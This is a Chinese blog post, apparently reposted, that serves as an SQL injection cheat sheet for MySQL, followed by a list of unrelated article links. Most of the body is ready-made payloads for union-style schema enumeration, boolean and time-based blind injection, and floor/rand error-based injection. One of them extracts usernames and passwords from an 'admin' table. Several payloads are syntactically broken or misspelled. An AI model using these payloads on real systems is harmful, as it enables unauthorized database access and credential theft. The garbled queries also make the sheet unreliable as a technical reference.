注入复习总结-白红宇

注入复习总结

阅读量：5972 次

发布时间：2019-06-19

本文共 2443 字，大约阅读时间需要 8 分钟。

/*不定期更新*/

Mysql Code:

#常规注入：select schema_name from information_schema.schemata;select group_concat(table_name) from information_schema.tables where table_schema=0x73716C696E6A656374;select group_concat(column_name) from information_schema.columns where table_schema=0x73716C696E6A656374;#盲注:select and ascii(mid(databases(),1,1))=115;select and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1));select and ascii(substring((select columns_name from information_schema.columns where column_schena=database() limit 1,1),1,1));#延时盲注：select and if(ascii(substring(database(),1,)),sleep(10),1);select and if(ascii(substring((select table_name from information_schema.tables where table_schema=0x73716C696E6A656374),sleep(10),1));select and if(ascii(substring((select columns_name from information_schema.columns where column_schema=0x73716C696E6A656374)),1,1),sleep(10),1);#floor报错注入and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

信息收集函数：

user()                             #当前使用者的用户名database()                         #当前数据库名version()                          #数据库版本datadir                            #读取数据库的绝对路径@@vasedir                          #Mysql安装路径@@version_compile_os               #操作系统concat()                           #连接一个或者多个字符串group_concat()                     #连接一个组的所有字符串，并以逗号分隔每一条数据

报错常用的函数：

count  #计算元组的个数rand    #取随机数floor    #想下取正，比如1.9就取1

结束

转载地址：http://xwzox.baihongyu.com/

你可能感兴趣的文章

【干货】界面控件DevExtreme视频教程大汇总！

查看>>

Java小细节

查看>>

poj - 1860 Currency Exchange

查看>>

洛谷 P2486 BZOJ 2243 [SDOI2011]染色

查看>>

数值积分中的辛普森方法及其误差估计

查看>>

Web service (一) 原理和项目开发实战

查看>>

跑带宽度多少合适_跑步机选购跑带要多宽，你的身体早就告诉你了

查看>>

深入理解Java的接口和抽象类

查看>>

Javascript异步数据的同步处理方法

查看>>

iis6 zencart1.39 伪静态规则

查看>>

SQL Server代理(3/12)：代理警报和操作员

查看>>

Linux备份ifcfg-eth0文件导致的网络故障问题

查看>>

2018年尾总结——稳中成长

查看>>

通过jsp请求Servlet来操作HBASE

Centos下基于Hadoop安装Spark（分布式）